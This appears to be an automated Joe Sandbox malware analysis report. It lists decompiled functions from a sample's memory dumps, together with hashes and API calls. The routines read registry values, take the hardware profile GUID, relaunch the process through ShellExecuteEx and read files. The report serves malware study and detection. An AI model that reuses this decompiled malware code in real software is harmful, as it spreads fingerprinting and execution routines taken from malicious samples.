Opcode ID: fe3fb2fc6423d3235b7c17287a7d26e133f0254a975ab95cd6796d579850b6b3
Instruction ID: 2167d51dff051bb279b2b5c05b7e30a5065249318a89016aa1474468b9e9d2cc
Opcode Fuzzy Hash: fe3fb2fc6423d3235b7c17287a7d26e133f0254a975ab95cd6796d579850b6b3
Instruction Fuzzy Hash: 0A014FB5A41208BBDB00DFE0DD49FEEB7B8EB48704F008568FA05A7291D7745A50CB55

Uniqueness

Uniqueness Score: -1.00%

Function 02D2B1D0, Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 02D2B1E4
RtlAllocateHeap.NTDLL(00000000), ref: 02D2B1EB
RegOpenKeyExA.ADVAPI32(80000002,0041A1A0,00000000,00020119,02D25AF9), ref: 02D2B20B
RegQueryValueExA.ADVAPI32(02D25AF9,0041A5E4,00000000,00000000,?,000000FF), ref: 02D2B22C
RegCloseKey.ADVAPI32(02D25AF9), ref: 02D2B236

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 14f82c3a1c4a03ad05b10c880fed87cc913976545a251b3981974c41da736b85
Instruction ID: e90e959be6ff7f00323556be8c27776f6d26ae91cf064fe9d53d9811dd8e90e9
Opcode Fuzzy Hash: 14f82c3a1c4a03ad05b10c880fed87cc913976545a251b3981974c41da736b85
Instruction Fuzzy Hash: 40014FB5A41208BFEB00DBE0ED49FEEB7B8EB48704F008569FA05A7291D6746A50CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0040B240, Relevance: 7.5, APIs: 5, Instructions: 38
registrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B240() {
				void* _v8;
				int _v12;
				void* _v16;
				char* _t18;
				char* _t19;

				_v12 = 0xff;
				_v16 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_t18 =  *0x41a610; // 0x2e494a0
				if(RegOpenKeyExA(0x80000002, _t18, 0, 0x20119,  &_v8) == 0) {
					_t19 =  *0x41a1f4; // 0x2e4bbf0
					RegQueryValueExA(_v8, _t19, 0, 0, _v16,  &_v12);
				}
				RegCloseKey(_v8);
				return _v16;
			}

0x0040b246
0x0040b261
0x0040b26f
0x0040b283
0x0040b291
0x0040b29c
0x0040b29c
0x0040b2a6
0x0040b2b2

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040B254
RtlAllocateHeap.NTDLL(00000000), ref: 0040B25B
RegOpenKeyExA.ADVAPI32(80000002,02E494A0,00000000,00020119,?), ref: 0040B27B
RegQueryValueExA.ADVAPI32(?,02E4BBF0,00000000,00000000,?,000000FF), ref: 0040B29C
RegCloseKey.ADVAPI32(?), ref: 0040B2A6

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: fe3fb2fc6423d3235b7c17287a7d26e133f0254a975ab95cd6796d579850b6b3
Instruction ID: 923f0571c0864a17576b372675103fc2b24e7fdb5a8175b3b8f490f686ce64a9
Opcode Fuzzy Hash: fe3fb2fc6423d3235b7c17287a7d26e133f0254a975ab95cd6796d579850b6b3
Instruction Fuzzy Hash: 70013CB5A41208BBDB00DBE0DD49FEEB7B8EB48700F0085A8FA05A7291D6745A508B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B090, Relevance: 7.5, APIs: 5, Instructions: 38
registrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B090() {
				void* _v8;
				int _v12;
				void* _v16;
				char* _t18;
				char* _t19;

				_v12 = 0xff;
				_v16 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_t18 =  *0x41a3f4; // 0x2e4b658
				if(RegOpenKeyExA(0x80000002, _t18, 0, 0x20119,  &_v8) == 0) {
					_t19 =  *0x41a4dc; // 0x2e4bba8
					RegQueryValueExA(_v8, _t19, 0, 0, _v16,  &_v12);
				}
				RegCloseKey(_v8);
				return _v16;
			}

0x0040b096
0x0040b0b1
0x0040b0bf
0x0040b0d3
0x0040b0e1
0x0040b0ec
0x0040b0ec
0x0040b0f6
0x0040b102

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040B0A4
RtlAllocateHeap.NTDLL(00000000), ref: 0040B0AB
RegOpenKeyExA.ADVAPI32(80000002,02E4B658,00000000,00020119,?), ref: 0040B0CB
RegQueryValueExA.ADVAPI32(?,02E4BBA8,00000000,00000000,?,000000FF), ref: 0040B0EC
RegCloseKey.ADVAPI32(?), ref: 0040B0F6

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: df4039e8785e81f7b3363609146fe50ac8c96b68d8374592efb58b1d304fb9ce
Instruction ID: f8a54f85ee1b8cfc6e3047c75a8daca849fb19f3d1c37cdae7566096d66fd71d
Opcode Fuzzy Hash: df4039e8785e81f7b3363609146fe50ac8c96b68d8374592efb58b1d304fb9ce
Instruction Fuzzy Hash: 4C014FB5A41208BFD700DFE0DD49FEEB7B8EB48700F00C568FA05A7291D6745A50CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF80, Relevance: 7.5, APIs: 5, Instructions: 38
registrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AF80() {
				void* _v8;
				int _v12;
				void* _v16;
				char* _t18;
				char* _t19;

				_v12 = 0xff;
				_v16 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_t18 =  *0x41a1a0; // 0x2e4b8c0
				if(RegOpenKeyExA(0x80000002, _t18, 0, 0x20119,  &_v8) == 0) {
					_t19 =  *0x41a5e4; // 0x2e4ad80
					RegQueryValueExA(_v8, _t19, 0, 0, _v16,  &_v12);
				}
				RegCloseKey(_v8);
				return _v16;
			}

0x0040af86
0x0040afa1
0x0040afaf
0x0040afc3
0x0040afd1
0x0040afdc
0x0040afdc
0x0040afe6
0x0040aff2

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040AF94
RtlAllocateHeap.NTDLL(00000000), ref: 0040AF9B
RegOpenKeyExA.ADVAPI32(80000002,02E4B8C0,00000000,00020119,?), ref: 0040AFBB
RegQueryValueExA.ADVAPI32(?,02E4AD80,00000000,00000000,?,000000FF), ref: 0040AFDC
RegCloseKey.ADVAPI32(?), ref: 0040AFE6

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 14f82c3a1c4a03ad05b10c880fed87cc913976545a251b3981974c41da736b85
Instruction ID: 3560b0945dc9351a47cb67e23b673332a76d6e647168765e51ac926b13a32b36
Opcode Fuzzy Hash: 14f82c3a1c4a03ad05b10c880fed87cc913976545a251b3981974c41da736b85
Instruction Fuzzy Hash: 19014FB5A41208BFEB00DBE0DD49FEEB7BCEB48700F108569FA05A7291D6745A60CB56

Uniqueness

Uniqueness Score: -1.00%

Function 02D2B510, Relevance: 7.5, APIs: 5, Instructions: 30memorystringCOMMON

Download Yara Rule

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 02D2B51D
GetProcessHeap.KERNEL32(00000000,00000064), ref: 02D2B52B
RtlAllocateHeap.NTDLL(00000000), ref: 02D2B532
memset.NTDLL ref: 02D2B549
lstrcat.KERNEL32(?,?), ref: 02D2B55A

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: Heap$AllocateCurrentProcessProfilelstrcatmemset
String ID:
API String ID: 4122951905-0
Opcode ID: 715a3ee425a4e0458906170b038f95fce73c32c5e13b901f43c8444701ff9b20
Instruction ID: 59f9290d20edaecea9e94a5763dc4894530d1e63f58a3d81dd2f30789123cb26
Opcode Fuzzy Hash: 715a3ee425a4e0458906170b038f95fce73c32c5e13b901f43c8444701ff9b20
Instruction Fuzzy Hash: 6FF0BE70A00209ABEB20ABA0DE08B9977BCBB08709F0080A4F705D7290DA758D50CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0040B2C0, Relevance: 7.5, APIs: 5, Instructions: 30
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040B2C0() {
				struct tagHW_PROFILE_INFOA _v132;
				void* _v136;

				if(GetCurrentHwProfileA( &_v132) == 0) {
					return 0x4191a0;
				}
				_v136 = RtlAllocateHeap(GetProcessHeap(), 0, 0x64);
				memset(_v136, 0, 4);
				 *0x41aa24(_v136,  &(_v132.szHwProfileGuid));
				return _v136;
			}

0x0040b2d5
0x00000000
0x0040b31a
0x0040b2e8
0x0040b2f9
0x0040b30a
0x00000000

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 0040B2CD
GetProcessHeap.KERNEL32(00000000,00000064), ref: 0040B2DB
RtlAllocateHeap.NTDLL(00000000), ref: 0040B2E2
memset.NTDLL ref: 0040B2F9
lstrcat.KERNEL32(?,?), ref: 0040B30A

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: Heap$AllocateCurrentProcessProfilelstrcatmemset
String ID:
API String ID: 4122951905-0
Opcode ID: 715a3ee425a4e0458906170b038f95fce73c32c5e13b901f43c8444701ff9b20
Instruction ID: 53f97c33c887665c50d9d4951fdbbfd19b7c782c8dc218844e441fa5d8454051
Opcode Fuzzy Hash: 715a3ee425a4e0458906170b038f95fce73c32c5e13b901f43c8444701ff9b20
Instruction Fuzzy Hash: 8FF05470A012099BDB20ABA4DD09B9977BCFB44701F008565FB45D7281DB359951CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004124F0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004124F0(intOrPtr __ecx, void* _a4, char _a8) {
				int _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;

				_v20 = __ecx;
				if( *((intOrPtr*)(_v20 + 0x84)) == 0) {
					if( *(_v20 + 0x7c) == 0) {
						 *((intOrPtr*)(_v20 + 0x14)) = 0x1000000;
						return 0;
					}
					_t42 =  &_v16; // 0x412876
					_t43 =  &_a8; // 0x412876
					_v12 = ReadFile( *(_v20 + 0x7c), _a4,  *_t43, _t42, 0);
					if(_v12 != 0) {
						_t51 =  &_v16; // 0x412876
						 *((intOrPtr*)(_v20 + 0x74)) =  *((intOrPtr*)(_v20 + 0x74)) +  *_t51;
						_t54 =  &_v16; // 0x412876
						 *((intOrPtr*)(_v20 + 0x78)) = E00411280( *((intOrPtr*)(_v20 + 0x78)), _a4,  *_t54);
						_t60 =  &_v16; // 0x412876
						return  *_t60;
					}
					return 0;
				}
				if( *((intOrPtr*)(_v20 + 0x8c)) <  *((intOrPtr*)(_v20 + 0x88))) {
					_v8 =  *((intOrPtr*)(_v20 + 0x88)) -  *((intOrPtr*)(_v20 + 0x8c));
					_t14 =  &_a8; // 0x412876
					if(_v8 >  *_t14) {
						_t15 =  &_a8; // 0x412876
						_v8 =  *_t15;
					}
					memcpy(_a4,  *((intOrPtr*)(_v20 + 0x84)) +  *((intOrPtr*)(_v20 + 0x8c)), _v8);
					 *((intOrPtr*)(_v20 + 0x8c)) =  *((intOrPtr*)(_v20 + 0x8c)) + _v8;
					 *((intOrPtr*)(_v20 + 0x74)) =  *((intOrPtr*)(_v20 + 0x74)) + _v8;
					 *((intOrPtr*)(_v20 + 0x78)) = E00411280( *((intOrPtr*)(_v20 + 0x78)), _a4, _v8);
					return _v8;
				}
				return 0;
			}

0x004124f6
0x00412503
0x004125b7
0x00412617
0x00000000
0x0041261e
0x004125bb
0x004125bf
0x004125d4
0x004125db
0x004125e7
0x004125ed
0x004125f0
0x0041260a
0x0041260d
0x00000000
0x0041260d
0x00000000
0x004125dd
0x0041251b
0x00412536
0x0041253c
0x0041253f
0x00412541
0x00412544
0x00412544
0x00412562
0x00412577
0x00412589
0x004125a6
0x00000000
0x004125a9
0x00000000

APIs

memcpy.NTDLL(?,?,00004000,?,00412876,?,00004000), ref: 00412562
ReadFile.KERNEL32(00000000,?,v(A,v(A,00000000,?,00412876,?,00004000), ref: 004125CE

Strings

v(A, xrefs: 004125BB, 004125E7, 004125F0, 0041260D, 004125BE, 004125F3
v(A, xrefs: 004125BF, 0041253C, 00412541, 004125C2

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: FileReadmemcpy
String ID: v(A$v(A
API String ID: 1163090680-3205644266
Opcode ID: 7275ca954cdc286a3f8e939b103dc98b6529853cd61c34709e59e34097809bab
Instruction ID: 57ccbe00efff64c7029569c4514cc3a27c1a1315352579a716a79c0d7299f08d
Opcode Fuzzy Hash: 7275ca954cdc286a3f8e939b103dc98b6529853cd61c34709e59e34097809bab
Instruction Fuzzy Hash: 5641BAB5A00119EFCB44CF94C980EEEB7B6BF48304F108569E429D7351D735E951DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02D2C1F0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000104,?,00000104), ref: 02D2C229
wsprintfA.USER32 ref: 02D2C244
ShellExecuteEx.SHELL32(0000003C), ref: 02D2C2A3

Strings

<, xrefs: 02D2C25A

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: ExecuteFileModuleNameShellwsprintf
String ID: <
API String ID: 690967290-4251816714
Opcode ID: cc4ab47e39a32b177838befeb9b88c04774d03333c1683d2c599034bba0e339c
Instruction ID: 4e5a96ae717cc4d62b7a0a1fc515015165c911704306e00e142983afd43d8d38
Opcode Fuzzy Hash: cc4ab47e39a32b177838befeb9b88c04774d03333c1683d2c599034bba0e339c
Instruction Fuzzy Hash: 4321F1B1D0021CABDB14EFE0DC89FDE77B9EB44705F00455AE214B6290DBB55A88CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040BFA0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040BFA0(void* __ecx) {
				struct HINSTANCE__* _v32;
				struct HINSTANCE__* _v36;
				struct HINSTANCE__* _v40;
				CHAR* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				struct HINSTANCE__* _v56;
				struct HINSTANCE__* _v60;
				char _v64;
				char _v332;
				char _v596;
				CHAR* _t37;
				intOrPtr _t38;
				intOrPtr _t43;

				E0040B720( &_v596, 0x104);
				E0040B720( &_v332, 0x104);
				GetModuleFileNameA(0,  &_v332, 0x104);
				_t37 =  *0x41a2c4; // 0x2e4d188
				wsprintfA( &_v596, _t37,  &_v332);
				E0040B6E0(_t37,  &_v64, 0, 0x3c);
				_v64 = 0x3c;
				_v60 = 0;
				_v56 = 0;
				_t38 =  *0x41a694; // 0x2e324c0
				_v52 = _t38;
				_t43 =  *0x41a770; // 0x2e494c8
				_v48 = _t43;
				_v44 =  &_v596;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				 *0x41aa84( &_v64);
				E0040B720( &_v64, 0x3c);
				E0040B720( &_v596, 0x104);
				return E0040B720( &_v332, 0x104);
			}

0x0040bfb5
0x0040bfc6
0x0040bfd9
0x0040bfe6
0x0040bff4
0x0040c005
0x0040c00a
0x0040c011
0x0040c018
0x0040c01f
0x0040c025
0x0040c028
0x0040c02e
0x0040c037
0x0040c03a
0x0040c041
0x0040c048
0x0040c053
0x0040c05f
0x0040c070
0x0040c089

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000104,?,00000104), ref: 0040BFD9
wsprintfA.USER32 ref: 0040BFF4
ShellExecuteEx.SHELL32(0000003C), ref: 0040C053

Strings

<, xrefs: 0040C00A

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: ExecuteFileModuleNameShellwsprintf
String ID: <
API String ID: 690967290-4251816714
Opcode ID: 0d3fa1aa40dd4b54a01f72a3a6220bdd8af4e0c74f435e2c109b568a61a03135
Instruction ID: b6c0095fef0d0179f9846f7a94a4eacab4548b86fc187f3e8670100f81996cfc
Opcode Fuzzy Hash: 0d3fa1aa40dd4b54a01f72a3a6220bdd8af4e0c74f435e2c109b568a61a03135
Instruction Fuzzy Hash: 5D21EDB1900208ABDB14EFA0DC89FDEB778EB48705F00456AF214B61D1DBB95648CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 02D26380, Relevance: 6.4, APIs: 5, Instructions: 150stringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 02D263BC
lstrcpy.KERNEL32(?,00000000), ref: 02D2640C
lstrcpy.KERNEL32(?,00000000), ref: 02D2643A
lstrcpy.KERNEL32(?,00000000), ref: 02D26468
lstrcpy.KERNEL32(?,00000000), ref: 02D26496

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: lstrcpy$wsprintf
String ID:
API String ID: 553454533-0
Opcode ID: aa32a037b7bd4a0b7568ab49524ffa8f354fa4865ca45a1c5ffad3e0f155a9a0
Instruction ID: cc991a9f135f506955e3afd6d7846e0cbe9092bdc8d8d8e0cbd90735d07354ee
Opcode Fuzzy Hash: aa32a037b7bd4a0b7568ab49524ffa8f354fa4865ca45a1c5ffad3e0f155a9a0
Instruction Fuzzy Hash: 995162F6D00118BBD715EB94DC45FDA737DAB6C308F044699F609A2240EA74EE98CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00406130, Relevance: 6.4, APIs: 5, Instructions: 150
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00406130(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, char _a24, intOrPtr _a28, intOrPtr _a32) {
				char _v8;
				char _v276;
				char _v540;
				intOrPtr _v544;
				char _v548;
				char _v552;
				char _v556;
				CHAR* _t43;
				void* _t45;
				intOrPtr _t46;
				void* _t49;
				intOrPtr _t50;
				void* _t53;
				intOrPtr _t54;
				void* _t57;
				intOrPtr _t58;
				intOrPtr _t62;
				char _t73;
				void* _t99;
				void* _t100;
				void* _t109;

				E0040B720( &_v540, 0x104);
				E0040B720( &_v276, 0x104);
				_t43 =  *0x41a200; // 0x2e47000
				_t76 =  &_v540;
				wsprintfA( &_v540, _t43, _a4);
				_t100 = _t99 + 0xc;
				_t114 = _a28;
				if(_a28 == 0) {
					_v8 = _a24;
				} else {
					_t73 = E00413730(0, 0x6400000, 0);
					_t100 = _t100 + 0xc;
					_v8 = _t73;
				}
				_t45 = E0040BF50(_t76, _t114, 0x1a);
				_t46 =  *0x41a574; // 0x2e47018
				 *0x41aac8( &_v276, E0040BEB0(_a12, _t46, _t45));
				_t49 = E0040BF50(_a12, _t114, 0x1c);
				_t50 =  *0x41a518; // 0x2e46e50
				 *0x41aac8( &_v276, E0040BEB0( &_v276, _t50, _t49));
				_t53 = E0040BF50( &_v276, _t114, 0x28);
				_t54 =  *0x41a2f8; // 0x2e47030
				 *0x41aac8( &_v276, E0040BEB0( &_v276, _t54, _t53));
				_t57 = E0040BF50( &_v276, _t114, 0x10);
				_t58 =  *0x41a494; // 0x2e46e38
				 *0x41aac8( &_v276, E0040BEB0( &_v276, _t58, _t57));
				_t62 = E0040C090(_a16, ",",  &_v548);
				_t109 = _t100 + 0x4c;
				_v544 = _t62;
				while(1) {
					_t115 = _v544;
					if(_v544 == 0) {
						break;
					}
					E00405E40( &_v276, _t115, _a4, _v8, 0x41401a,  &_v276, _v544, _a20, _a8, _a28, _a32);
					_t62 = E0040C090(0, ",",  &_v548);
					_t109 = _t109 + 0x30;
					_v544 = _t62;
				}
				__eflags = _a28;
				if(_a28 != 0) {
					E00413800(_v8,  &_v552,  &_v556);
					E004137E0(_a24,  &_v540, _v552, _v556);
					return E0040B720( &_v8, 4);
				}
				return _t62;
			}

0x00406145
0x00406156
0x0040615f
0x00406165
0x0040616c
0x00406172
0x00406175
0x00406179
0x00406194
0x0040617b
0x00406184
0x00406189
0x0040618c
0x0040618c
0x00406199
0x004061a2
0x004061bc
0x004061c4
0x004061cd
0x004061ea
0x004061f2
0x004061fb
0x00406218
0x00406220
0x00406229
0x00406246
0x0040625c
0x00406261
0x00406264
0x0040626a
0x0040626a
0x00406271
0x00000000
0x00000000
0x0040629e
0x004062b4
0x004062b9
0x004062bc
0x004062bc
0x004062c4
0x004062c8
0x004062dc
0x004062fd
0x00000000
0x0040630b
0x00406313

APIs

wsprintfA.USER32 ref: 0040616C
lstrcpy.KERNEL32(?,00000000), ref: 004061BC
lstrcpy.KERNEL32(?,00000000), ref: 004061EA
lstrcpy.KERNEL32(?,00000000), ref: 00406218
lstrcpy.KERNEL32(?,00000000), ref: 00406246

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: lstrcpy$wsprintf
String ID:
API String ID: 553454533-0
Opcode ID: 339612030bc37ffdbe752cae41bfb9cb2c421f843c437781f6b1cccd39fe225c
Instruction ID: 97311c7f6f8bc2fe4aa679da1049fe92a67fa3411fccba4dc07eac06f42ff0f5
Opcode Fuzzy Hash: 339612030bc37ffdbe752cae41bfb9cb2c421f843c437781f6b1cccd39fe225c
Instruction Fuzzy Hash: 365177F690010CBBC715EF94DC46FDB7378AB5C304F0445A9F609A7181EA78AA94CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 02D32340, Relevance: 6.1, APIs: 4, Instructions: 131COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,02D32D2E,?,?), ref: 02D323B8
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,02D32D2E), ref: 02D3240A

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: bd9446f4783b8dd7e6d95fa0f5fa15532bd816b395c3834064200ff55a53ee91
Instruction ID: e3ebfc9cec54faa37dc75f71acc36c4da79d67658d18e0c4474ab3f574d86b83
Opcode Fuzzy Hash: bd9446f4783b8dd7e6d95fa0f5fa15532bd816b395c3834064200ff55a53ee91
Instruction Fuzzy Hash: C551B474D002099FDB04DFA8C884BEEBBB5BB48314F14C259E825AB391D735A945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 004120F0, Relevance: 6.1, APIs: 4, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004120F0(intOrPtr __ecx, void* _a4, long _a8) {
				long _v8;
				intOrPtr _v12;
				struct _FILETIME _v20;
				signed short _v24;
				signed short _v28;
				struct _SYSTEMTIME _v44;
				intOrPtr _v48;
				intOrPtr _t88;
				intOrPtr _t89;
				intOrPtr _t115;
				intOrPtr _t117;
				long _t130;
				intOrPtr _t131;
				intOrPtr _t132;

				_v48 = __ecx;
				 *(_v48 + 0x7c) = 0;
				 *(_v48 + 0x84) = 0;
				 *((char*)(_v48 + 0x80)) = 0;
				 *(_v48 + 0x78) = 0;
				 *(_v48 + 0x70) = 0;
				 *(_v48 + 0x90) = 0;
				 *(_v48 + 0x74) = 0;
				if(_a4 == 0 || _a4 == 0xffffffff) {
					return 0x10000;
				} else {
					_v8 = SetFilePointer( *(_v48 + 4), 0, 0, 1);
					if(_v8 == 0xffffffff) {
						 *((intOrPtr*)(_v48 + 0x4c)) = 0x80000000;
						 *(_v48 + 0x70) = 0xffffffff;
						if(_a8 != 0) {
							 *(_v48 + 0x70) = _a8;
						}
						 *((char*)(_v48 + 0x6c)) = 0;
						GetLocalTime( &_v44);
						SystemTimeToFileTime( &_v44,  &_v20);
						_t130 = _v20.dwLowDateTime;
						E00411670(_t130, _v20.dwHighDateTime,  &_v28,  &_v24);
						_t88 = E00411630(_v20.dwLowDateTime, _v20.dwHighDateTime);
						_t115 = _v48;
						 *((intOrPtr*)(_t115 + 0x50)) = _t88;
						 *(_t115 + 0x54) = _t130;
						_t131 = _v48;
						_t89 = _v48;
						 *((intOrPtr*)(_t131 + 0x58)) =  *((intOrPtr*)(_t89 + 0x50));
						 *((intOrPtr*)(_t131 + 0x5c)) =  *((intOrPtr*)(_t89 + 0x54));
						_t117 = _v48;
						_t132 = _v48;
						 *((intOrPtr*)(_t117 + 0x60)) =  *((intOrPtr*)(_t132 + 0x50));
						 *((intOrPtr*)(_t117 + 0x64)) =  *((intOrPtr*)(_t132 + 0x54));
						 *(_v48 + 0x68) = _v24 & 0x0000ffff | (_v28 & 0x0000ffff) << 0x00000010;
						 *(_v48 + 0x7c) = _a4;
						return 0;
					}
					_v12 = E00411720(_a4, _v48 + 0x4c, _v48 + 0x70, _v48 + 0x50, _v48 + 0x68);
					if(_v12 == 0) {
						SetFilePointer(_a4, 0, 0, 0);
						 *((char*)(_v48 + 0x6c)) = 1;
						 *(_v48 + 0x7c) = _a4;
						return 0;
					}
					return _v12;
				}
			}

0x004120f6
0x004120fc
0x00412106
0x00412113
0x0041211d
0x00412127
0x00412131
0x0041213e
0x00412149
0x00000000
0x0041215b
0x0041216e
0x00412175
0x004121df
0x004121e9
0x004121f4
0x004121fc
0x004121fc
0x00412202
0x0041220a
0x00412218
0x0041222a
0x0041222e
0x0041223e
0x00412246
0x00412249
0x0041224c
0x0041224f
0x00412252
0x00412258
0x0041225e
0x00412261
0x00412264
0x0041226a
0x00412270
0x00412283
0x0041228c
0x00000000
0x0041228f
0x0041219f
0x004121a6
0x004121ba
0x004121c3
0x004121cd
0x00000000
0x004121d0
0x00000000
0x004121a8

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,00412ADE,?,?), ref: 00412168
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00412ADE), ref: 004121BA

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: bd9446f4783b8dd7e6d95fa0f5fa15532bd816b395c3834064200ff55a53ee91
Instruction ID: 73fee1c067eb70601bd9df8ab8ea40709189a789a85f05da52033877ad893135
Opcode Fuzzy Hash: bd9446f4783b8dd7e6d95fa0f5fa15532bd816b395c3834064200ff55a53ee91
Instruction Fuzzy Hash: 4A51D7749002099FDB04DFA8C484BDEBBB5BB4C304F14C15AE925AB391D775A986CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02D32000, Relevance: 6.1, APIs: 4, Instructions: 127COMMON

Download Yara Rule

APIs

new[].LIBCMTD ref: 02D32060
memcpy.NTDLL(00000000,?,000000FF,?,02D32AED,?,000000FF,?,00004000), ref: 02D3208C
memcpy.NTDLL(?,00004000,000000FF,?,02D32AED,?,000000FF,?,00004000), ref: 02D3211D

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: memcpy$new[]
String ID:
